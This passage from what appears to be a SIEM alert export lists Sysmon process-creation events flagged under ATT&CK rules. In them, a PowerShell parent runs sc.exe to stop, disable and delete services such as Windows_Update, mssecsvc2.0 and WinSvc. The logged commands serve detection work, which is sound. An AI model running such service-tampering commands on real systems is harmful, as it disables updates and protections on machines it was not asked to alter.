12:49:34.882"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010c0661900}"",""processId"":""6000"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.102",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.850 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001063641900} +ProcessId: 3512 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.852136500Z"",""eventRecordID"":""2108"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.850\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001063641900}\r\nProcessId: 3512\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:34.850"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001063641900}"",""processId"":""3512"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.087",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.840 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001099631900} +ProcessId: 960 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Windows_Update Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.842467600Z"",""eventRecordID"":""2107"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.840\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001099631900}\r\nProcessId: 960\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.840"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001099631900}"",""processId"":""960"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Windows_Update Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.056",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.817 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001007621900} +ProcessId: 3952 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.820112000Z"",""eventRecordID"":""2105"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.817\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001007621900}\r\nProcessId: 3952\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.817"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001007621900}"",""processId"":""3952"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.993",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.764 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00107b5f1900} +ProcessId: 4780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.766944100Z"",""eventRecordID"":""2102"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.764\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00107b5f1900}\r\nProcessId: 4780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.764"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00107b5f1900}"",""processId"":""4780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.971",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: 
+RuleName: +UtcTime: 2020-05-28 12:49:34.719 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010825d1900} +ProcessId: 4240 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.721609800Z"",""eventRecordID"":""2100"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.719\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010825d1900}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.719"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010825d1900}"",""processId"":""4240"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.947",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.697 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010775c1900} +ProcessId: 4248 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.698688300Z"",""eventRecordID"":""2099"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.697\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010775c1900}\r\nProcessId: 4248\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.697"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010775c1900}"",""processId"":""4248"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
